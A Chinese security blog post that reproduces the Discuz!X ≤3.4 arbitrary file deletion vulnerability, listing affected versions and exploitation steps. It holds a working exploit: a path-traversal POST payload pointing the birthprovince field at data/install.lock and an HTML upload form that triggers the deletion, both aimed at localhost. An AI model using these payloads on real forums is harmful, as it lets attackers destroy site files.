Walks

网络安全爱好者

Discuz!X ≤3.4 任意文件删除漏洞

前言:
复现下Discuz!X 任意文件删除漏洞

目录:
0x01:漏洞描述
0x02:影响版本
0x03:如何利用


漏洞描述:

Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台

2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞导致前台用户可以任意删除文件


影响产品:

Discuz!X ≤3.4


如何利用:

  • 修改出生地

POST:birthprovince=../../../data/install.lock&profilesubmit=1&formhash=5a608602

URL:http://localhost:81/Discuz3.3/home.php?mod=spacecp&oc=profile&op=base

  • 上传任一图片

<form  action="http://localhost:81/Discuz3.3/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">  
<input type="file" name="birthprovince" id="file" />  
<input type="text" name="formhash" value="5a608602"/></p>  
<input type="text" name="profilesubmit" value="1"/></p>  
<input type="submit" value="Submit" />  
</from>


浅谈:

1:影响很大,在这个大家都不重视安全的环境里,等同于ODAY。

2:任意文件删除,如果别人要对一个Discuz社区做破坏的话,利用这个漏洞就十分简单

3:但无法重装,虽然可以删除install.lock,但是discuz在安装后,会删除install的index.php,所以无法重装。


成果图

《Discuz!X ≤3.4 任意文件删除漏洞》

参考地址:https://paper.seebug.org/411/

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

8 + 1 =